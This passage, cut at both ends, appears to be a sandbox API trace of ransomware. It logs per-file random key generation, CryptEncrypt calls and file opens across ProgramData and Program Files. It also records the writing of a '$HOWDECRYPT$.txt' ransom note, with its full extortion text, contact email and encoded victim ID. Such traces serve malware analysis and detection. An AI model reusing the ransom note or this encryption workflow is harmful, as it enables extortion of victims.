dwFlags=0x0, lpMem=0x2f402c0 | out: hHeap=0x2c0000) returned 1 [0160.487] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea70 | out: pbBuffer=0x248ea70) returned 1 [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.487] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea68*=0x30) returned 1 [0160.487] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.Lck" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.lck"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.487] GetProcessHeap () returned 0x2c0000 [0160.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef6e8 | out: hHeap=0x2c0000) returned 1 [0160.488] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea70 | out: pbBuffer=0x248ea70) returned 1 [0160.488] GetProcessHeap () returned 0x2c0000 [0160.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.488] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea68*=0x30) returned 1 [0160.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.488] GetProcessHeap () returned 0x2c0000 [0160.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.488] GetProcessHeap () returned 0x2c0000 [0160.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef600 | out: hHeap=0x2c0000) returned 1 [0160.488] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea68 | out: pbBuffer=0x248ea68) returned 1 [0160.488] GetProcessHeap () returned 0x2c0000 [0160.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.488] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea60*=0x30) returned 1 [0160.488] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MTOC_help.H1H" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mtoc_help.h1h"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.488] GetProcessHeap () returned 0x2c0000 [0160.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.488] GetProcessHeap () returned 0x2c0000 [0160.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb3198 | out: hHeap=0x2c0000) returned 1 [0160.488] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea68 | out: pbBuffer=0x248ea68) returned 1 [0160.489] GetProcessHeap () returned 0x2c0000 [0160.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea60*=0x30) returned 1 [0160.489] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_BestBet.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_bestbet.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.489] GetProcessHeap () returned 0x2c0000 [0160.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.489] GetProcessHeap () returned 0x2c0000 [0160.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef518 | out: hHeap=0x2c0000) returned 1 [0160.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea60 | out: pbBuffer=0x248ea60) returned 1 [0160.489] GetProcessHeap () returned 0x2c0000 [0160.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea58*=0x30) returned 1 [0160.489] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_MKWD_AssetId.H1W" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_mkwd_assetid.h1w"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.489] GetProcessHeap () returned 0x2c0000 [0160.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.489] GetProcessHeap () returned 0x2c0000 [0160.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef430 | out: hHeap=0x2c0000) returned 1 [0160.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea60 | out: pbBuffer=0x248ea60) returned 1 [0160.490] GetProcessHeap () returned 0x2c0000 [0160.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea58*=0x30) returned 1 [0160.490] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Assistance\\Client\\1.0\\en-US\\Help_CValidator.H1D" (normalized: "c:\\programdata\\microsoft\\assistance\\client\\1.0\\en-us\\help_cvalidator.h1d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.490] GetProcessHeap () returned 0x2c0000 [0160.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.490] GetProcessHeap () returned 0x2c0000 [0160.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef348 | out: hHeap=0x2c0000) returned 1 [0160.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea58 | out: pbBuffer=0x248ea58) returned 1 [0160.490] GetProcessHeap () returned 0x2c0000 [0160.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea50*=0x30) returned 1 [0160.490] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\.." (normalized: "c:\\programdata"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.490] GetProcessHeap () returned 0x2c0000 [0160.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.491] GetProcessHeap () returned 0x2c0000 [0160.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x379a98 | out: hHeap=0x2c0000) returned 1 [0160.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea58 | out: pbBuffer=0x248ea58) returned 1 [0160.491] GetProcessHeap () returned 0x2c0000 [0160.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea50*=0x30) returned 1 [0160.491] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\." (normalized: "c:\\programdata\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.491] GetProcessHeap () returned 0x2c0000 [0160.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.491] GetProcessHeap () returned 0x2c0000 [0160.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d388 | out: hHeap=0x2c0000) returned 1 [0160.491] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\adobe\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.491] GetProcessHeap () returned 0x2c0000 [0160.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0a728 | out: hHeap=0x2c0000) returned 1 [0160.492] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\adobe\\arm\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.492] GetProcessHeap () returned 0x2c0000 [0160.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33de70 | out: hHeap=0x2c0000) returned 1 [0160.492] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\$HOWDECRYPT$.txt" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.492] GetProcessHeap () returned 0x2c0000 [0160.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea8f38 | out: hHeap=0x2c0000) returned 1 [0160.492] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea48 | out: pbBuffer=0x248ea48) returned 1 [0160.492] GetProcessHeap () returned 0x2c0000 [0160.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.492] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea40*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea40*=0x30) returned 1 [0160.492] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.492] GetProcessHeap () returned 0x2c0000 [0160.492] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.493] GetProcessHeap () returned 0x2c0000 [0160.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07c58 | out: hHeap=0x2c0000) returned 1 [0160.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea40 | out: pbBuffer=0x248ea40) returned 1 [0160.493] GetProcessHeap () returned 0x2c0000 [0160.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea38*=0x30) returned 1 [0160.493] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.493] GetProcessHeap () returned 0x2c0000 [0160.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.493] GetProcessHeap () returned 0x2c0000 [0160.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07b88 | out: hHeap=0x2c0000) returned 1 [0160.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea40 | out: pbBuffer=0x248ea40) returned 1 [0160.493] GetProcessHeap () returned 0x2c0000 [0160.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea38*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea38*=0x30) returned 1 [0160.493] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.493] GetProcessHeap () returned 0x2c0000 [0160.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.494] GetProcessHeap () returned 0x2c0000 [0160.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e07ab8 | out: hHeap=0x2c0000) returned 1 [0160.494] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea38 | out: pbBuffer=0x248ea38) returned 1 [0160.494] GetProcessHeap () returned 0x2c0000 [0160.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0160.494] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ea30*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ea30*=0x30) returned 1 [0160.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\pm-dodge.exe" (normalized: "c:\\program files (x86)\\windows sidebar\\pm-dodge.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.494] GetProcessHeap () returned 0x2c0000 [0160.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0160.494] GetProcessHeap () returned 0x2c0000 [0160.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1870 | out: hHeap=0x2c0000) returned 1 [0160.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0160.495] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.495] WriteFile (in: hFile=0xa0, lpBuffer=0x248e96b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ea94, lpOverlapped=0x0 | out: lpBuffer=0x248e96b*, lpNumberOfBytesWritten=0x248ea94*=0x127, lpOverlapped=0x0) returned 1 [0160.496] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.496] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ea94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ea94*=0x2ac, lpOverlapped=0x0) returned 1 [0160.496] CloseHandle (hObject=0xa0) returned 1 [0160.496] GetProcessHeap () returned 0x2c0000 [0160.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e06258 | out: hHeap=0x2c0000) returned 1 [0160.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0160.628] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0160.628] WriteFile (in: hFile=0x178, lpBuffer=0x248e967*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ea90, lpOverlapped=0x0 | out: lpBuffer=0x248e967*, lpNumberOfBytesWritten=0x248ea90*=0x127, lpOverlapped=0x0) returned 1 [0160.629] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0160.629] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ea90, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ea90*=0x2ac, lpOverlapped=0x0) returned 1 [0160.629] CloseHandle (hObject=0x178) returned 1 [0160.629] GetProcessHeap () returned 0x2c0000 [0160.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8adf8 | out: hHeap=0x2c0000) returned 1 [0160.630] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea30 | out: pbBuffer=0x248ea30) returned 1 [0160.630] GetProcessHeap () returned 0x2c0000 [0160.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.630] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea28*=0x30) returned 1 [0160.630] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_windy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_windy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.632] GetProcessHeap () returned 0x2c0000 [0160.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.632] GetProcessHeap () returned 0x2c0000 [0160.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3fb18 | out: hHeap=0x2c0000) returned 1 [0160.632] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea28 | out: pbBuffer=0x248ea28) returned 1 [0160.632] GetProcessHeap () returned 0x2c0000 [0160.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.632] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea20*=0x30) returned 1 [0160.632] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_snow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.634] GetProcessHeap () returned 0x2c0000 [0160.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.634] GetProcessHeap () returned 0x2c0000 [0160.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3fa00 | out: hHeap=0x2c0000) returned 1 [0160.634] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea28 | out: pbBuffer=0x248ea28) returned 1 [0160.634] GetProcessHeap () returned 0x2c0000 [0160.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.634] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea20*=0x30) returned 1 [0160.634] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-gibbous_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.636] GetProcessHeap () returned 0x2c0000 [0160.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.636] GetProcessHeap () returned 0x2c0000 [0160.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3be80 | out: hHeap=0x2c0000) returned 1 [0160.636] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ea20 | out: pbBuffer=0x248ea20) returned 1 [0160.636] GetProcessHeap () returned 0x2c0000 [0160.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.636] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248ea18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248ea18*=0x30) returned 1 [0160.636] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_black_moon-waxing-crescent_partly-cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.637] GetProcessHeap () returned 0x2c0000 [0160.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.637] GetProcessHeap () returned 0x2c0000 [0160.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3bd38 | out: hHeap=0x2c0000) returned 1 [0160.638] CryptGenRandom (in: hProv=0x2d5df8, 